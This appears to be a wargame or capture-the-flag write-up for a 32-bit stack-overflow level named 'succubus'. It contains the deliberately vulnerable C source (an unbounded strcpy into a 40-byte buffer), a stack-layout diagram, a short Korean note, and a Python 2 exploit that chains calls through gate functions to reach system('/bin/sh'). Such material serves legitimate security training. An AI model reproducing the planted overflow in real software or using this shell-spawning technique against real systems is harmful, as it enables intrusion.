#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
// the inspector
// Stage counter shared by the gate functions below: DO() sets it to 1, each
// later stage exits unless it holds the previous stage's value and then
// advances it, and MO() runs only once it has reached 4.
int check = 0;
void MO(char *cmd)
{
    /*
     * Final stage: reachable only after YUT() has advanced check to 4.
     * cmd is passed to system() without any validation, so whatever string
     * it points at is run through the shell; this gated call is what the
     * exercise is built around.
     */
    if (check == 4) {
        fputs("welcome to the MO!\n", stdout);
        // olleh!
        system(cmd);
        return;
    }
    exit(0);
}
void YUT(void)
{
    /* Fourth stage: requires check == 3 (left by GUL) and moves it to 4. */
    if (check == 3) {
        fputs("welcome to the YUT!\n", stdout);
        check = 4;
        return;
    }
    exit(0);
}
void GUL(void)
{
    /* Third stage: requires check == 2 (left by GYE) and moves it to 3. */
    if (check == 2) {
        fputs("welcome to the GUL!\n", stdout);
        check = 3;
        return;
    }
    exit(0);
}
void GYE(void)
{
    /* Second stage: requires check == 1 (left by DO) and moves it to 2. */
    if (check == 1) {
        fputs("welcome to the GYE!\n", stdout);
        check = 2;
        return;
    }
    exit(0);
}
void DO(void)
{
    /* First stage: no precondition; simply starts the counter at 1. */
    fputs("welcome to the DO!\n", stdout);
    check = 1;
}
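/*
 * Entry point of the training binary. argv[1] is copied into a 40-byte stack
 * buffer with strcpy() on purpose: the exercise is built around that
 * overflow, so the copy is deliberately left unbounded. Two filters run
 * first: any 0x40 byte in argv[1] is rejected, and the 4 bytes at argv[1]+44
 * (buffer + saved frame pointer, i.e. the return-address slot) must equal
 * &DO. After the copy, most of the stack above and below the buffer is
 * zeroed. The address arithmetic assumes a 32-bit process whose stack ends
 * at 0xbfffffff; it is not meaningful on a 64-bit build.
 * Returns 0 on the normal path; every rejected input ends in exit(0).
 */
int main(int argc, char *argv[])
{
    char buffer[40];
    char *addr;

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    // you cannot use library
    // Rejects any 0x40 byte in argv[1]; per the comment this presumably
    // targets 0x40xxxxxx shared-library addresses on the original host —
    // confirm against that target's memory map.
    if (strchr(argv[1], '\x40')) {
        printf("You cannot use library\n");
        exit(0);
    }
    // check address
    // Reads 4 bytes at offset 44 without checking that argv[1] is that long,
    // so a shorter argument makes memcmp read past its terminator.
    addr = (char *)&DO;
    if (memcmp(argv[1]+44, &addr, 4) != 0) {
        printf("You must fall in love with DO\n");
        exit(0);
    }
    // overflow!
    // Intentional: unbounded copy of argv[1] into the 40-byte buffer.
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    // stack destroyer
    // 100 : extra space for copied argv[1]
    // Zeroes the buffer and saved-frame-pointer slot (44 bytes), leaves the
    // next 104 bytes (return address onward) untouched, then zeroes from
    // buffer+148 up to the assumed stack top 0xbfffffff. The (int) cast of a
    // pointer is only valid on a 32-bit target.
    memset(buffer, 0, 44);
    memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));
    // LD_* eraser
    // 40 : extra space for memset function
    // Zeroes 2960 bytes below the buffer. Pointer arithmetic outside the
    // array is undefined behaviour; it is relied on here to wipe the region
    // the comment attributes to LD_* environment data.
    memset(buffer-3000, 0, 3000-40);
    return 0;
}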
--------------------
buffer[40]
--------------------
sfp
--------------------
ret ☞ DO
--------------------
GYE
--------------------
GUL
--------------------
YUT
--------------------
MO
--------------------
dummy
--------------------
/bin/sh 주소
--------------------
/bin/sh
--------------------
이렇게 익스해보고, seg fault 뜨면 core dump 파일 분석해서 /bin/sh 주소만 다시 찾아서 익스하면 된다.
import os
import struct
# Packs a value as 32-bit little-endian; the target is a 32-bit binary (main()
# compares exactly 4 bytes of &DO).
p32 = lambda x: struct.pack("<I", x)
# Addresses of the five gate functions in ./succubus. They belong to that
# specific build and must be re-read if the binary differs.
DO=0x080487ec
GYE=0x080487bc
GUL=0x0804878c
YUT=0x0804875c
MO=0x08048724
filename = "./succubus"
#filename = "./XXXXXXXX"
# Layout after the 44 filler bytes (40-byte buffer + saved frame pointer),
# exactly as the stack diagram above shows: DO's address lands in the
# return-address slot that main() checks with memcmp(argv[1]+44, &DO, 4),
# followed by GYE, GUL, YUT, MO, the dummy slot ("AAAA"), the stack address
# of the trailing "/bin/sh" string (re-derived from a core dump when it is
# off, per the text above) and the string itself, which MO() receives as cmd.
# NOTE(review): concatenating struct.pack output with str literals only works
# under Python 2 — confirm the interpreter used.
payload = p32(DO)+p32(GYE)+p32(GUL)+p32(YUT)+p32(MO)+"AAAA"+p32(0xbffffaa8)+"/bin/sh"
os.execv(filename,[filename, "A"*44 + payload])